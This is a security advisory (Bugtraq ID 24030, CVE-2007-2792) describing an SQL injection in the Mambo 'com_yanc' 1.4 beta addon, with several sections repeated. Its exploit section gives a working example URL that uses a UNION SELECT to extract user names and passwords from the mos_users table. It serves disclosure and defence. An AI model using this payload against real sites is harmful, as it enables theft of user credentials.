Mambo Com_Yanc Add On ListID Parameter SQL Injection Vulnerability
BID:24030
Info
Mambo Com_Yanc Add On ListID Parameter SQL Injection Vulnerability
| Bugtraq ID: | 24030 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-2792 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 23 2007 12:00AM |
| Updated: | May 07 2015 05:39PM |
| Credit: | Bulan is credited with the discovery of this vulnerability. |
| Vulnerable: |
com_yanc com_yanc 1.4 beta |
| Not Vulnerable: |
com_yanc com_yanc 1.5 com_yanc com_yanc 1.4 RC1 |
Discussion
Mambo Com_Yanc Add On ListID Parameter SQL Injection Vulnerability
The Mambo 'com_yanc' addon is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Mambo 'com_yanc' 1.4 beta is vulnerable; other versions may also be affected.
The Mambo 'com_yanc' addon is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Mambo 'com_yanc' 1.4 beta is vulnerable; other versions may also be affected.
Exploit / POC
Mambo Com_Yanc Add On ListID Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example exploit is available:
http://www.example.com/index.php?option=com_yanc&Itemid=9999999&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
Attackers can use a browser to exploit this issue.
The following example exploit is available:
http://www.example.com/index.php?option=com_yanc&Itemid=9999999&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
Solution / Fix
Mambo Com_Yanc Add On ListID Parameter SQL Injection Vulnerability
Solution:
The vendor has released an update to address this issue for the Joomla version of YaNC. Contact the vendor for details on obtaining and applying the appropriate updates.
Solution:
The vendor has released an update to address this issue for the Joomla version of YaNC. Contact the vendor for details on obtaining and applying the appropriate updates.
References
Mambo Com_Yanc Add On ListID Parameter SQL Injection Vulnerability
References:
References:
- Joomla! Homepage (Joomla )
- Mambo Homepage (Mambo)
- Topic: YaNC 1.4 beta 3 vulnerability (YaNC)